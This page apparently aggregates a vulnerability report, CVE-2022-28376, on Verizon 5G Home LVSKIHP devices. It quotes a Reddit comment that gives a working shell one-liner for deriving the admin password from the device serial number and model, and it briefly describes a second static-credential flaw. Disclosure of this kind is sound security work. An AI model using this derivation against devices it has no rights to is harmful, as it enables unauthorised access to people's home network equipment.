Headline
CVE-2022-28376: r/verizon - Comment by u/snakamoto2 on ”5G Home Internet Dropping Out”
Verizon 5G Home LVSKIHP outside devices through 2022-02-15 allow anyone (knowing the device’s serial number) to access a CPE admin website, e.g., at the 10.0.0.1 IP address. The password (for the verizon username) is calculated by concatenating the serial number and the model (i.e., the LVSKIHP string), running the sha256sum program, and extracting the first seven characters concatenated with the last seven characters of that SHA-256 value.
well, Verizon custom support will never tell you the credential but I manage to get it.
the username is verizon. the password is calculated using your S/N and device model (check SKU printed on your device)
Here’s the algorithm
snmodel_sha256=echo -n $SN_VALIDATION$model | sha256sum snmodel_first7char=echo $snmodel_sha256 | cut -c1-7 snmodel_last7char=echo $snmodel_sha256 | cut -c58-64 pwd=$snmodel_first7char$snmodel_last7char
“$SN_VALIDATION” is your device S/N “$model” is LVSKIHP (SKU printed on device)
Related news
On Verizon 5G Home LVSKIHP InDoorUnit (IDU) 3.4.66.162 and OutDoorUnit (ODU) 3.33.101.0 devices, the CRTC and ODU RPC endpoints rely on a static account username/password for access control. This password can be generated via a binary included in the firmware, after ascertaining the MAC address of the IDU's base Ethernet interface, and adding the string DEVICE_MANUFACTURER='Wistron_NeWeb_Corp.' to /etc/device_info to replicate the host environment. This occurs in /etc/init.d/wnc_factoryssidkeypwd (IDU).